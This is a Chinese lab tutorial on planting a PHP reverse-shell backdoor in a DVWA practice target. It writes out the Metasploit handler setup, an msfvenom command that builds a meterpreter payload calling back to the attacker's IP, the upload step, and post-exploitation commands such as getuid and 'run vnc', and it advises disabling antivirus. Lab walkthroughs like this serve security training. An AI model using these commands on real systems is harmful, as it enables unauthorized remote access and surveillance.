PHP后门反弹演示

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP后门反弹演示相关的知识,希望对你有一定的参考价值。

准备

  1. 一台kali虚拟机
  2. 一台 win11物理机
  1. phpstudy 开启 nginxmysql
  2. phpstudy中已经搭建好DVWA靶场
  3. DVWA靶场的安全等级调整值low

注意:

需要将杀毒软件个关了, 否则有提示, 黑客入侵.

开始

使用监控模块, 输入:

use exploit/multi/handler

配置payload

set payload php/meterpreter/reverse_tcp

# 接着输入
options

PHP后门反弹演示_php

设置 lhost 和lport

这里发现 攻击机的端口不用设置了, 已经有了, 只要设置lhost 就可以了

set lhost 攻击机的ip

PHP后门反弹演示_php_02

生成php后门执行攻击获得meterpreter

注意:  要新建端口, 在root权限下执行

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip  lport=4444 R>shell.php

PHP后门反弹演示_Nginx_03

PHP后门反弹演示_Nginx_04

这样在window11左面少就有这个文件了

上传文件

这是我原来的地址: http://dvwa/vulnerabilities/upload/#

这是我要填写的地址: http://dvwa/hackable/uploads/shell.php

出现上图几面说明:   这是正常的, 后门已经上传到了靶机上

获得权限

  1. 输入:

run 

# 也可以直接输入 exploit , 都一样

PHP后门反弹演示_php_05

也可能出现 404, 都是正常现象

只要有这两行, 就代表上传的后门生效了

PHP后门反弹演示_上传_06

成功啦

  1. 获取管理员的名字, 输入:

getuid

  1. 观看屏幕 可以在meterpreter里输入

run vnc

点开文件即可看到自己电脑的画面

以上是关于PHP后门反弹演示的主要内容,如果未能解决你的问题,请参考以下文章

msfconsole web后门

PHP被植入恶意软件后门

msf建立php反弹shell

PHP安全之webshell和后门检测

PHP的93个WordPress插件有后门

PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)